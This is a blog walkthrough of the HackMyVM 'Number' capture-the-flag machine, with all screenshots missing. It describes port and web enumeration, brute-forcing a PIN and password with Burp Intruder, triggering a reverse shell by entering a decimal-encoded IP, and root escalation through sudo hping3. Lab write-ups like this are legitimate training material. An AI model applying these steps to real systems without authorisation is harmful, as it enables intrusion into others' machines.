HackMyVM Number Walkthrough

by Vince
in Blog
Hits: 1120

Another cyber range appeared recently and it's similar to Vulnhub where people upload VM's, you download them, and get flags.  There's a points system like TryHackMe and HackTheBox which is a great way to gamify the environment.  I was curious to play and I download Number. 

The box does not have a description other than it states that it's a Medium level system.

We kick off with Nmap:



We find a web port.  Enumerating with Nikto:


Then with GoBuster:



We find a login:



But after a few seconds of looking around, I feel like there's something missing.  We check out /pin:



We capture a request in Burp and we send it to Intruder:



Using Sniper, we'll attempt to brute force the pin:



Using seq -w 0000 4444, I create a list of numbers for our brute force:



Adding in the error message:


 
After a few seconds (Burp Pro), we learn the pin is 4444:



We go back to the pin page and enter our pin:



That doesn't help us:



We move back to Sniper thinking that 4444 is our password:



I'm just using a subset of RockYou as my wordlist, I think it's 100k lines:



Entering the error message:



After a bit, we uncover the username:  melon



Back to the login:



We are then presented with yet another form:



We enter an IP address but it only accepts numbers:



Just a quick sanity check:



It likes numbers, not decimal points.  We can convert an IP to decimal:



I enter the decimal equivalent of my attacking machine:



Since it's spawning a reverse shell, I setup tcpdump because I need to know which port:



When we hit submit, we see an inbound connection on the familiar 4444.  We setup a handler:



After we submit again, we catch a shell.  When we clean is up, we enter into the melon home directory and we find:



When cat look at flag.sh, we find:



This won't work for us since we're not the user melon.  Since we're unable to SSH, I assume the password has to be simple. 



You can read the flag at this point without the use of the script.  Checking sudo privileges:



We elevate using hping3 and we only have one last thing to do: